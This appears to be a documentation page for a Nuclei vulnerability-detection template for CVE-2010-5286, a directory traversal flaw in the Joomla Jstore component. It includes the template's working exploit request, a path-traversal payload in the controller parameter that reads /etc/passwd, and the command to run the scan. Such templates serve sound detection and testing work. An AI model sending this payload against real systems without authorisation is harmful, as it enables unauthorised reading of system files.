Joomla! Component Jstore - 'Controller' Local File Inclusion
ID: CVE-2010-5286
Severity: critical
Author: daffainfo
Tags: cve2010,cve,joomla,lfi,edb,packetstorm,joobi
Description
Section titled “Description”A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2010-5286
info: name: Joomla! Component Jstore - 'Controller' Local File Inclusion author: daffainfo severity: critical description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. impact: | Arbitrary file inclusion leading to remote code execution remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34837 - https://nvd.nist.gov/vuln/detail/CVE-2010-5286 - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2010-5286 cwe-id: CWE-22 epss-score: 0.08973 epss-percentile: 0.94583 cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joobi product: com_jstore tags: cve2010,cve,joomla,lfi,edb,packetstorm,joobi
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a0047304502204b126645c5e50a3ff2265aa71e2a4e14daac62842d01c1fefe73268ed0b87379022100f103563b469a38443008cf86bfa8c8a16e2d1bb584a65714ce06c957e6ead6f2:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-5286.yaml"